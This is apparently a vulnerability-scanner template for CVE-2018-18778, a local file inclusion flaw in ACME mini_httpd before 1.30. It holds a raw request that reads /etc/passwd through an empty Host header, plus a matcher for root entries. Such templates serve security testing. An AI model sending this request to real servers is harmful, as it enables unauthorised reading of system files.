42 lines
985 B
YAML
42 lines
985 B
YAML
id: CVE-2018-18778
|
|
|
|
info:
|
|
name: ACME mini_httpd <1.30 - Local File Inclusion
|
|
author: dhiyaneshDK
|
|
severity: medium
|
|
description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
|
|
- http://www.acme.com/software/mini_httpd/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-18778
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2018-18778
|
|
cwe-id: CWE-200
|
|
epss-score: 0.95125
|
|
cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: acme
|
|
product: mini-httpd
|
|
tags: cve,cve2018,lfi,mini_httpd
|
|
|
|
http:
|
|
- raw:
|
|
- |+
|
|
GET /etc/passwd HTTP/1.1
|
|
Host:
|
|
|
|
unsafe: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|